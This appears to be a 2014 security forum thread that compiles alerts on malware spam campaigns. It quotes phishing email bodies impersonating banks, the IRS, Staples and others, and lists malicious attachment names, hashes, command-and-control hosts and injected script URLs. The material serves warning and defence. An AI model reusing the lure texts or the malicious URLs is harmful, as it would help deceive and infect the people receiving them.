SPAM frauds, fakes, and other MALWARE deliveries...

[AplusWebMaster]

FYI...

More malicious "Voice Message from Unknown" SPAM
- http://blog.dynamoo.com/2014/01/more...nown-spam.html
8 Jan 2014 - "Another bunch of fake "voice message" spams with a malicious payload are doing the rounds, for example:
Subject: Voice Message from Unknown (996-743-6568)
Subject: Voice Message from Unknown (433-358-8977)
Subject: Voice Message from Unknown (357-973-7738)
Body:
- - -Original Message- - -
From: 996-743-6568
Sent: Wed, 8 Jan 2014 12:06:38 +0000
To: [redacted]
Subject: Important Message to All Employees

Attached is a file VoiceMessage.zip which in turn contains VoiceMessage.exe which has a VirusTotal detection rate of 11/47*. Automated analysis tools... show an attempted connection to casbir .com .au on 67.22.142.68 (Cologlobal, Canada). This appears to be the only server on this IP address, so blocking or monitoring it for the time being may be prudent."
* https://www.virustotal.com/en-gb/fil...is/1389191399/
___

jConnect Fax Spam
- http://threattrack.tumblr.com/post/7...nnect-fax-spam
Jan 8, 2014 - "Subjects Seen:
jConnect fax from “<phone number>” - 21 page(s), Caller-ID: <phone number>
Typical e-mail details:
Fax Message [Caller-ID: <phone number>]
You have received a 21 page(s) fax at 2012-12-17 05:25:32 EST.
* The reference number for this fax is lax3_did10-1514386087-4062628129-11.
This message can be opened using your PDF reader. If you have not already installed j2 Messenger, download it for free: j2.com/downloads
Please visit j2 .com/help if you have any questions regarding this message or your j2 service.
Thank you for using jConnect!

Malicious File Name and MD5:
FAX_93-238738192_19.zip (3A8CAA5972CF72CCEB0C40531C28B5AB)
FAX_93-238738192_19.exe (CA2628B955CAC2C8B6BD9F8C4C504FA4)

Screenshot: https://31.media.tumblr.com/24541843...Lm51r6pupn.png

Tagged: jconnect, Upatre
___

LinkedIn Makes Federal Case Out of Fake Accounts
- http://blogs.wsj.com/digits/2014/01/...fake-accounts/
Jan 7, 2014 - "LinkedIn, the business-focused social network, charged in a federal civil lawsuit that 10 unnamed people had created thousands of fake accounts that can be used to pass on malicious computer code or puff up users’ profiles. In a suit filed Monday in U.S. District Court for the Northern District of California, LinkedIn said it had deleted the abusive accounts and traced them to an Amazon Web Services account. It’s asking the cloud computing giant to hand over the names of the owners of the web-services accounts. Amazon Web Services offers computing power for rent via the Internet. An Amazon spokeswoman did not immediately respond to a request for comment. LinkedIn accuses the unnamed people of violating its user agreement by creating multiple fake accounts that stole data from legitimate LinkedIn profiles through a method called scraping*..."
* http://www.hotforsecurity.com/blog/l...tors-7594.html
Jan 8, 2014 - "... In November, Bitdefender warned about fake LinkedIn profiles that gather personal details** and lead users to dangerous websites..."
** http://www.hotforsecurity.com/blog/a...fers-7362.html
Nov 21, 2013 - "... As many users speak English and a native language, the scam aims at most countries in the world especially the US, where over 84 million users are active on LinkedIn. The fake recruiter spreads the link to the scam using URL shortening techniques. The bogus profile of “Annabella Erica” was already injected into authentic LinkedIn groups such as Global Jobs Network, which includes 167,000 users worldwide. Members of the social network are now sharing insights on more than 2.1 million groups, so the number of victims exposed to the scam could be a lot higher. The fake employment website is registered on a reputable “.com” domain to avoid raising doubts as to its authenticity. Scammers gather e-mail addresses and passwords they may later use for identity theft. Fraudsters usually register websites for longer periods and sometimes make their pages look even better than legitimate websites..."
___

inTuit/TurboTax phish
- http://security.intuit.com/alert.php?a=95
1/7/14 - "Here is a copy of the phishing email people are receiving. Be sure -not- to open the attachment.

TurboTax Alert: Your $4,120.55 Tax Refund!
> http://security.intuit.com/images/ttphish.jpg
Dear Customer,
You've received a Tax Refund of $4,120.55.
Kindly find attached file to view your Refund Confirmation from TurboTax.
Please keep this refund confirmation for your records.
NOTE: TurboTax/IRS will not request your banking details through email, sms or telephone.
Thank you for using TurboTax

This is the end of the -fake- email.
Steps to Take Now:
Do -not- open the email attachment...
Delete the email."

[AplusWebMaster]

FYI...

Fake Browser update site installs Malware
- http://www.symantec.com/connect/blog...stalls-malware
9 Jan 2014 - "In the first week of 2014, we came across a website using tried and tested social engineering techniques to coerce victims into installing malware. The domain http ://newyear[REMOVED]fix .com, was registered on Dec 30, 2013. Based on our research, 94 percent of attacks appear to be targeting users based in the United Kingdom through advertising networks and free movie streaming and media sites... This particular social engineering attack is not novel, and plays on victims’ fear of needing to install urgent updates. Since the domain was registered only last week, it appears the attacker thought of this scheme at the very last minute, as the holiday season starts winding down. The website, which is hosted in the -Ukraine- uses a dual hybrid Web server setup by Apache and Nginx, with the latter identifying the victim’s browser and performing a redirect. The user will see the Google Chrome, Mozilla Firefox, and Microsoft Internet Explorer templates...
Page displayed to Chrome users
> http://www.symantec.com/connect/site...Update%201.png
Page displayed to Firefox users
> http://www.symantec.com/connect/site...Update%202.png
Page displayed to Internet Explorer users
> http://www.symantec.com/connect/site...Update%203.png
JavaScript loop button which requires 100 clicks to close
> http://www.symantec.com/connect/site...Update%204.png
At the time of this blog post, the Internet Explorer version of the Web page is no longer functional. The Chrome download page serves up Chromeupdate.exe while the Firefox download page serves up Firefoxupdate.exe. Both of these samples are detected by Symantec as Trojan.Shylock*..."
* http://www.symantec.com/security_res...092916-1617-99
___

Spam Overdose Yields Fareit, Zeus and Cryptolocker
- http://www.f-secure.com/weblog/archives/00002655.html
Jan 9, 2014 - "... massive spam surge with the same subjects and attachments in our spam traps.
>> http://www.f-secure.com/weblog/archives/emails.PNG
>>> http://www.f-secure.com/weblog/archives/emailstats.png
The binary attachment is a threat that is often referred to as Fareit. Fareit is known to steal information such as credentials and account information from installed FTP clients and cryptocurrency wallets, and stored passwords in browsers. For the two samples coming from these spam, we've seen them connecting to these to send information:
• networksecurityx .hopto .org
• 188.167.38.131
• 94.136.131.2
• 66.241.103.146
• 37.9.50.200
In addition to stealing data, these samples download other malware including Zeus P2P... Other malware seen installed in the system was Cryptolocker.
> http://www.f-secure.com/weblog/archives/btc.PNG
... Samples are detected as Trojan.Pws.Tepfer and Trojan.GenericKD variants."

- http://google.com/safebrowsing/diagn...ite=hopto.org/

- https://www.virustotal.com/en/ip-add...1/information/

- https://www.virustotal.com/en/ip-add...2/information/

- https://www.virustotal.com/en/ip-add...6/information/

- https://www.virustotal.com/en/ip-add...0/information/
___

JPMorgan Chase SecureMail Spam
- http://threattrack.tumblr.com/post/7...ecuremail-spam
Jan 9, 2014 - "Subjects Seen:
You have a new encrypted message from JPMorgan Chase & CO.
Typical e-mail details:
You have received a secure e-mail message from JPMorgan Chase & CO..
We care about your privacy, JPMorgan Chase & CO. uses this secure way to exchange e-mails containing personal information.
Read your secure message by opening the attachment. You will be prompted to save (download) it to your computer.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
Secureinformation.zip (19CCB0B5FCF8D707671E5F98AC475D36)
Secureinformation.exe (7F81501C468FF358DE1DA5B1F1AD150B)

Screenshot: https://31.media.tumblr.com/84b205b1...loB1r6pupn.png

Tagged: Chase, Upatre
___

IRS Tax Return Spam
- http://threattrack.tumblr.com/post/7...ax-return-spam
Jan 9, 2014 - "Subjects Seen:
IRS: Early 2013 Tax Return Report!
Typical e-mail details:
Dear Member
Here is a report on your early 2013 Federal Tax return report. Kindly download the attachment to view your report and start filling for 2013 return as early as second week of December.
Thanks
Internal Revenue Service

Malicious File Name and MD5:
Early2013TaxReturnReport_D0E7937B80.zip (E76B91B9010AE7ABDC264380B95BF86D)
Early2013TaxReturnReport_983456948574980572398456324965984573984509324.pdf.exe (FE20A23BEC91B7EC1E301B571CE91100)

Screenshot: https://31.media.tumblr.com/a5c84027...RXE1r6pupn.png

Tagged: IRS, Fareit
___

- http://blog.mxlab.eu/2014/01/09/emai...ntains-trojan/

- https://www.virustotal.com/en/file/b...8bd5/analysis/
Early2013TaxReturnReport_ ...
Analysis date: 2014-01-10 12:55:07 UTC

- https://malwr.com/analysis/YzgyZWQzM...Y1OTU4MDdhODQ/

[AplusWebMaster]

FYI...

Fake Bank Statement SPAM
- http://threattrack.tumblr.com/post/7...statement-spam
Jan 10, 2014 - "Subjects Seen:
Bank Statement. Please read
Typical e-mail details:
Hello <email name>,
I attached the December Invoice that contains the Property Tax and the other document showing the details mentioned below.
I am at your disposal for any further question.
Waiting for your instructions concerning the document attached.
Goldie Oliver

Malicious File Name and MD5:
USBank_December_2013_17F9968085.zip (5A2E558A7DC17998A11A0FBFB34AACF9)
USBank - December 2013_ID39485394562093456309847589346598237598320471237481923427583450.pdf.exe (2089EAC526883C98D67D399449B461DB)

Screenshot: https://31.media.tumblr.com/66b87ad8...1p11r6pupn.png

Tagged: Bank Statement, Fareit
___

Junk Mail vs Scam Mail
- http://www.bbb.org/blog/2014/01/junk-mail-vs-scam-mail/
Jan 10, 2014 - "Many of the items sent to consumers in-boxes these days are little more than junk mail. But BBB warns a growing number of spam emails are designed to inflict harm. While it may seem like this topic comes up frequently, unfortunately, scammers find a way to catch users off guard. Right after the Target store hacking of some 40 million credit and debit cards, BBB issued a warning* about emails claiming to be from Target but were disguised as malware designed to steal identity information. The warning was issued in light of all the scam emails on internet right now. The hard part is telling the difference between a legitimate email from a vendor you do subscribe to and one that looks like the vendor but isn’t... Check for misspellings and grammatical errors. Silly mistakes and sloppy copy – for example, an area code that doesn’t match an address – often are giveaways that the site is a scam. Messaging like, “Just tell us where to send this $1,100” -or- “a delivery was cancelled because of problems with the mailing addressed and to please provide a correct address” is another giveaway. Companies typically do not use this type of language. A recent trend in scam emails are asking users to select a link on a state where they are to send the money or to send the correct address. This link will then lead to a site where a thief will use the information for their own use. It isn’t wise to select the links or open attachments in emails you aren’t familiar with especially ones you haven’t solicited from. When in doubt, check with the company before you respond to any website that asks you to enter personal identifying information. Bottom line, unless you’ve done business with the company or are on a mailing list with them – do -not- click on email links even if they appear to be from legitimate companies. Far too many times these days, it’s all just a scam."
* http://www.bbb.org/blog/2014/01/watc...t-data-breach/
___

Google linking of social network contacts to email raises concerns
- http://www.reuters.com/article/2014/...A081NH20140110
Jan 9, 2014 - "A new feature in Google Inc's Gmail will result in some users receiving messages from people with whom they have not shared their email addresses, raising concerns among some privacy advocates. The change, which Google announced on Thursday, broadens the list of contacts available to Gmail users so it includes both the email addresses of their existing contacts, as well as the names of people on the Google+ social network. As a result, a person can send an email directly to friends, and strangers, who use Google+. Google is increasingly trying to integrate its Google+, a two-and-a-half-year old social network that has 540 million active users, with its other services. When consumers sign up for Gmail, the company's Web-based email service, they are now automatically given a Google+ account. Google said the new feature will make it easier for people who use both services to communicate with their friends... Some privacy advocates said Google should have made the new feature "opt-in," meaning that users should explicitly agree to receive messages from other Google+ users, rather than being required to manually change the setting... A Google spokeswoman said the company planned to send an email to all Google+ users during the next two days alerting them to the change and explaining how to change their settings..."

[AplusWebMaster]

FYI...

Sefnit-added Tor service ...
- https://net-security.org/malware_news.php?id=2673
Jan 10, 2014 - "... the Sefnit click-fraud Trojan... has been around since 2009... This rapid rise in Tor connections has served to see just how many computers were infected with the malware, and the number was staggering: over four million. Since then, Microsoft has been working to diminish that number... Microsoft has decided to retroactively clean the machines that still had the Sefnit-added Tor service, and practically managed to do so for half of them - around 2 million - in just two months...
> http://www.net-security.org/images/a...012014-big.jpg
... two million cleaned computers is better than none, two million more remain at risk... In order to help these users, Microsoft has compiled a short step-by-step guide* on how to do it..."
* http://blogs.technet.com/b/mmpc/arch...or-hazard.aspx
9 Jan 2014

[AplusWebMaster]

FYI...

Fake Dept. of Treasury SPAM
- http://blog.dynamoo.com/2014/01/depa...notice-of.html
13 Jan 2014 - "This US Treasury spam (but apparently sent from salesforce .com) has a malicious attachment:
Date: Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From: "support@salesforce .com" [support@salesforce .com]
Subject: Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.
Questions should be directed to the Federal Service Desk ...

Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47*) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47**)... analysis shows an attempted connection to anggun.my .id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent."
* https://www.virustotal.com/en-gb/fil...is/1389622089/

** https://www.virustotal.com/en-gb/fil...is/1389622087/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake Financial Tips Attachment Email Messages - 2014 Jan 13
Fake Account Payment Information Email Messages - 2014 Jan 13
Fake Court Appearance Request Email Messages - 2014 Jan 13
Fake Product Catalog Email Messages - 2014 Jan 13
Fake Company Complaint Email Messages - 2014 Jan 13
Fake Bank Account Statement Email Messages - 2014 Jan 13
Fake Package Tracking Information Email Messages - 2014 Jan 13
Fake Payroll Invoice Email Messages - 2014 Jan 13
Fake Bank Payment Notification Email Messages - 2014 Jan 13
Fake Invoice Statement Attachment Email Messages - 2014 Jan 13
(More detail and links at the cisco URL above.)

[AplusWebMaster]

FYI...

Fake HSBC SPAM / Payment Advice.exe
- http://blog.dynamoo.com/2014/01/hsbc...m-payment.html
14 Jan 2014 - "This -fake- HSBC spam comes with a malicious attachment:
Date: Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From: HSBC Advising Service [advising.service.738805677.728003.693090157@ mail.hsbcnet.hsbc .com]
Subject: Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]
Sir/Madam
The attached payment advice is issued at the request of our customer. The advice is for your reference only.
Yours faithfully
Global Payments and Cash Management
HSBC ...

The is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48*. Automated analysis... shows an attempted connection to thebostonshaker .com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, blocking either temporarily may give some protection."
* https://www.virustotal.com/en-gb/fil...is/1389713473/
___

Unsolicted SPAM...
- http://blog.dynamoo.com/2014/01/unce...to-adware.html
14 Jan 2014 - "... plagued with these over the past few days, emails coming in with the following subjects:
Underground XXX files
Free porno torrents
Uncensored download
The body text contains just a link to [donotclick]goinst .com/download/getfile/1205000/0/?q=Uncensored%20download
In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" ... A quick look at the EXE in VirusTotal* indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably -not- behind the spam run, but are probably inadvertently paying the spammers for installations. Avoid."
* https://www.virustotal.com/en-gb/fil...is/1389715495/
___

More WhatsApp Message Spam
- http://threattrack.tumblr.com/post/7...p-message-spam
Jan 14, 2014 - Subjects Seen:
Missed voice message, “4:27”PM
Typical e-mail details:
New voicemessage.
Please download attached file
Description
Jan 09 2:44PM PM
08 seconds

Malicious File Name and MD5:
Missed-message.zip (687C8BE7F4A56A00AF03ED9DFC3BFB76)
Missed-message.exe (BF1411F18EA12E058BFB05692E422216)

Screenshot: https://gs1.wac.edgecastcdn.net/8019...KF81r6pupn.png

Tagged: WhatsApp, Upatre
___

Fake ADP invoice w/ Fiserv document - TROJAN
- http://blog.mxlab.eu/2014/01/14/genv...serv-document/
Jan 14, 2014 - "... intercepting different type of emails with an attached Gen:Variant.Strictor.49180.
> ADP Invoice - This email is send from the spoofed address “payroll.invoices@ adp .com” while the SMTP from is “fraud@ aexp .com”, comes with the subject “Invoice #3164342″ and has the following body:
Attached is the invoice (Invoice_ADP_3164342.zip) received from your bank.
Please print this label and fill in the requested information. Once you have filled out
all the information on the form please send it to payroll.invoices@ adp. com.
For more details please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you ,
Automatic Data Processing, Inc...
The attached ZIP file has the name Invoice_ADP_3164342.zip and contains the 19 kB large file Invoice_ADP_01142014.exe.

> Fiserv attached document - This email is send from the spoofed address “Fiserv <Debra_Drake@ fiserv .com>” while the SMTP from is “fraud@ aexp .com”, comes with the subject “FW: Scanned Document Attached” and has the following body:
Dear Business Associate:
Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center – a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.
You have an important message from Debra_Drake@ fiserv .com. To see your message, use the following password to decrypt attached file: JkSIbsJPPai
If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password... If you have any questions, please contact your Fiserv representative...
The attached ZIP file has the name FSEMC.Debra_Drake.zip and contains the 19 kB large file FSEMC_01142014.exe. The trojan is known as Gen:Variant.Strictor.49180 by most of the virus engines but also as PWSZbot-FMO!5B171D420618, Heuristic.LooksLike.Win32.Suspicious.J!81, TrojanDownloader:Win32/Upatre.A or PE:Malware.FakePDF@CV!1.9C28. At the time of writing, 12 of the 48 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/8...bb92/analysis/

- https://malwr.com/analysis/ZTNjMzM4Y...UyNmJjOTEyZDg/

- https://www.virustotal.com/en-gb/ip-...2/information/

- https://www.virustotal.com/en-gb/ip-...5/information/
___

Fake Quickbooks Invoice - Trojan.Zbot ...
- http://blog.mxlab.eu/2014/01/14/troj...mportant-docs/
Jan 14, 2014 - "... intercepting different type of emails with an attached Trojan.Zbot.IDE.
> Quickbooks Invoice: This email is send from the spoofed address “QuickBooks Invoice <auto-invoice@ quickbooks .com>” while the SMTP from is “fraud@ aexp .com”, has the subject “Notification of direct debit of fees” and has the following body:
Notification Number: 5430143
Mandate Number: 8396466
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 214.00 GBP from your nominated account on or as soon as possible before 15/01/2013.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov .uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry ...
The attached ZIP file has the name Notification_5430143.zip and contains the 19 kB large file Notification_1401.exe.
> Important Docs: This email is send from the spoofed address “Elbert Hickman <xxxx@ rbs .co .uk>” while the SMTP from is “fraud@aexp .com”, has the subject “Important Docs” and has the following body:
Check attached docs.
Elbert Hickman
Commercial Banking Support
Thames Gateway Commercial Office
2nd Floor, Riverbridge House, Anchor Boulevard,
Crossways, Dartford, Kent DA2 6SL
Depot Code 023
Tel: 01322 639620
Fax: 01322 606862
email: Elbert@ rbs .co .uk ...
The attached ZIP file has the name Docs_14012014.zip and contains the 19 kB large file Docs_14012014.exe. The trojan is known as Trojan.Zbot.IDE, Trojan-Spy.Zbot, TR/Yarwi.B.117, W32/Trojan.TROM-4807 or Trojan.Email.FakeDoc. At the time of writing, 14 of the 48 AV engines did detect the trojan at Virus Total*."
* https://www.virustotal.com/en/file/2...is/1389713323/

- https://malwr.com/analysis/ZjM0MmVjY...BjYzE5OTY5ZmI/

- https://www.virustotal.com/en-gb/ip-...7/information/

- https://www.virustotal.com/en-gb/ip-...4/information/
___

Fake PG&E SPAM
- http://blog.dynamoo.com/2014/01/pg-g...ment-spam.html
14 Jan 2014 - "This -fake- spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..
From: PG&E [do_not_reply@ sourcefort .com]
Reply-To: PG&E [do_not_reply@ sourcefort .com]
Date: 14 January 2014 22:37
Subject: Gas and Electric Usage Statement
PG & E ENERGY STATEMENT Account No: 718198305-5
Statement Date: 01/10/2014
Due Date: 02/01/2014
Your Account Summary
Amount Due on Previous Statement $344.70
Payment(s) Recieved Since Last Statement 0.0
Previous Unpaid Balance $344.70
Current Electric Charges $165.80
Current Gas Charges 49.20
Total Amount Due BY 02/01/2014 $559.7
To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement...

Screenshot: http://2.bp.blogspot.com/-AhQr4bPPcj.../s1600/pge.png

To give PG&E full credit, they have a link on their homepage about it and a full warning here*. These scam emails seem to have been doing the rounds for quite a few days now."
* http://www.pgecurrents.com/2014/01/0...-emails-calls/

[AplusWebMaster]

FYI...

Fake Staples order SPAM...
- http://blog.dynamoo.com/2014/01/stap...-awaiting.html
15 Jan 2014 - "This -fake- Staples spam has a malicious attachment:
Date: Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From: Staples Advantage Orders [Order@ staplesadvantage .com]
Subject: Your order is awaiting verification!
Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #: 5079728
Order Date and Eastern Time: 2/19/2013 12:28 PM
Order Total: $152.46
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance....

Screenshot: https://lh3.ggpht.com/--iaCgzY9eyg/U...0/staples2.png

Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47*. The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools."
* https://www.virustotal.com/en-gb/fil...is/1389799070/

- http://threattrack.tumblr.com/post/7...ification-spam
Jan 15, 2014 - "Subjects Seen:
Your order is awaiting verification!
Typical e-mail details:
Your order has been submitted and is awaiting verification from you.
Order #: 1178687
Order Date and Eastern Time: 2/19/2013 12:28 PM
Order Total: $271.74
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance...

Malicious File Name and MD5:
Order_1178687.zip (312C682B547215FB1462C7C46646A1B7)
Order_{_partorderb}.exe (1D85D2CC51AC6E1A2805366BB910EF70)

Screenshot: https://gs1.wac.edgecastcdn.net/8019...JYM1r6pupn.png

Tagged: Staples, Upatre
___

Fake RBS pwd reset SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbs-ba...e-pdf-malware/
15 Jan 2014 - "... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Of course the RBS Bankline Password Reset Form is not from RBS or any other bank. Once the scammers and malware purveyors find a new or different scam they will use every bank they can to try to infect as many users as they can. Normally when you see an attachment or email with a subject like RBS Bankline Password Reset Form, you automatically think that it is another phishing attempt. In this case it is not phishing but a very nasty malware- virus-trojan. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3. A signatory on the bank mandate must sign the form. Fax to 0845 878 9791 or alternatively email a scanned copy of the form to banklineadministration@ rbs .co .uk, on receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email. <<RBS_Bankline_Password_Reactivation.pdf>> Please note – The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered. Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details. If you are the sole Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in an Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner. If you require any further assistance then please do not hesitate to contact us...
Regards
Bankline Product Support ...

RBS_Bankline_Password_Reactivation.zip extracts to RBS_Bankline_Password_Reactivation.exe. Current Virus total detections: 2/48*. MALWR Auto Analysis**... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/e...3e0c/analysis/

** https://malwr.com/analysis/YmYyYjIzM...FjMTE5MTA1NGM/

38.102.226.94
- https://www.virustotal.com/en-gb/ip-...4/information/

- http://google.com/safebrowsing/diagnostic?site=AS:174
___

Compromised Sites pull Fake Flash Player from SkyDrive
- http://www.f-secure.com/weblog/archives/00002659.html
Jan 15, 2014 - "On most days, our WorldMap* shows more of the same thing. Today is an exception... One infection is topping so high in the charts that it pretty much captured our attention. Checking the recent history of this threat, we saw that these past few days, it has been increasing in infection hits... It wasn't long before we saw that a lot of scripts hosted in various websites got compromised. Our telemetry actually showed that almost 40% of the infected websites were hosted in Germany. In those sites, malicious code has been appended to the scripts... Successful redirection leads to a fake flash download site that look similar to these pages:
> http://www.f-secure.com/weblog/archives/5_flash1.PNG
... The user would have to manually click on the Download Now link before a file called flashplayer.exe could be downloaded from a certain SkyDrive account. When the malicious flashplayer.exe is executed, this message is displayed to the user.
> http://www.f-secure.com/weblog/archives/7_dialog.PNG
While in the background, it is once again connecting to the same SkyDrive account in order to download another malware... Initial analysis showed that the sample is connecting to these locations.
> http://www.f-secure.com/weblog/archives/9_post.PNG ..."

* http://worldmap3.f-secure.com/

- https://www.virustotal.com/en-gb/ip-...5/information/

- https://www.virustotal.com/en-gb/ip-...9/information/

[AplusWebMaster]

FYI...

Cushion Redirect sites using hijacked GoDaddy domains to block
- http://blog.dynamoo.com/2014/01/cush...-hijacked.html
16 Jan 2014 - "... some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine) which appears to be hosting some Cushion Redirect domains (explained here*) which is being injected into certain sites such as the one in this URLquery report**... A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects... The hijacked GoDaddy domains in question are:
allgaysitespassfree .com
amateurloginfree .com
yourchicagocarservice .com
yourchicagogranite .com
yourchicagohummerlimo .com
yourbestpartybus .com
A quick look at the Google stats for AS42655*** indicate to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites."
* http://malwaremustdie.blogspot.com/2...ttempt-to.html

** http://urlquery.net/report.php?id=8838865

- https://www.virustotal.com/en-gb/ip-...9/information/

*** http://www.google.com/safebrowsing/d...?site=AS:42655
___

Script exploits lead to Adscend Media LLC ads
- http://blog.dynamoo.com/2014/01/scri...end-media.html
16 Jan 2014 - "Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious. Here is a case in point.. the German website physiomedicor .de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report*. In this case it's pretty easy to tell what's going on from the URLquery screenshot:
> http://3.bp.blogspot.com/-BqNzhIdeK1...0/urlquery.jpg
What has happened is that somehow an attacker has altered several .js files on the victim's site and has appened extra code. In this case the code has been appened to [donotclick]www.physiomedicor .de/assets/rollover.js as follows...
> http://4.bp.blogspot.com/-Gb14LMV3ni...injection1.png
In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia .com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:
[donotclick]berriesarsuiz .com/ptc84vRb.php?id=117515949
[donotclick]www.karsons .co .uk/qdrX3tDB.php?id=114433444
... Adscend Media has been accused of deceptive advertising practices** before which makes me think that it might be a good candidate for -blocking- on your network, especially as they have private WHOIS details for that domain. If you want to banish these from your network then the following list might help:
199.59.164.5
adscendmedia .com
adshiftclick .com
jmp2 .am
lnkgt .com ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=8840002

** http://news.cnet.com/8301-1023_3-574...hington-state/

81.169.145.150
- https://www.virustotal.com/en-gb/ip-...0/information/
___

Fake malicious "ACTION REQUIRED" SPAM
- http://blog.dynamoo.com/2014/01/acti...s-arrived.html
16 Jan 2014 - "This spam with a lengthy subject has a malicious attachment:
Date: Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From: "support@salesforce .com" [support@salesforce .com]
Subject: ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority: High Priority 2
This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.
Record ID: HJRQY9PSXBSK334
Supplier: http ://[victimdomain .com]
Invoice No.: 5644366804
Document No.: 3319683775
Invoice amount: USD 0488.21
Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons.

Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48*... anaylsis shows an attempted connection to centrum .co .id on 75.98.233.44 (Ceranet, US). This is the only site on that server, blocking either the IP or domain might be useful."
* https://www.virustotal.com/en-gb/fil...is/1389889350/

- http://threattrack.tumblr.com/post/7...malicious-spam
Jan 16, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019...Q3n1r6pupn.png
Tagged: Salesforce, Upatre
___

Google+ Local - Thousands Of Hotel Listings Hijacked
- http://searchengineland.com/thousand...e-local-181670
Jan 14, 2014 - "Thousands of hotels listed within Google+ Local appear to have had links leading to their official sites “hijacked” and replaced with ones leading to third-party booking services. Google+ Local listings are what Google depends on to provide results in Google Maps or Google Search, when people look for local businesses... Doing a search on Google for Google+ Local listings using these domains reveals how thousands of hotels appear to have been hit. For example, a search for listings using the “RoomsToBook .Info” domain currently brings up 1,880 listings that appear to have been hijacked:
> http://searchengineland.com/figz/wp-...-4-600x816.jpg
Postscript: Google has now said that I can confirm it is aware of the issue and is working to fix it."

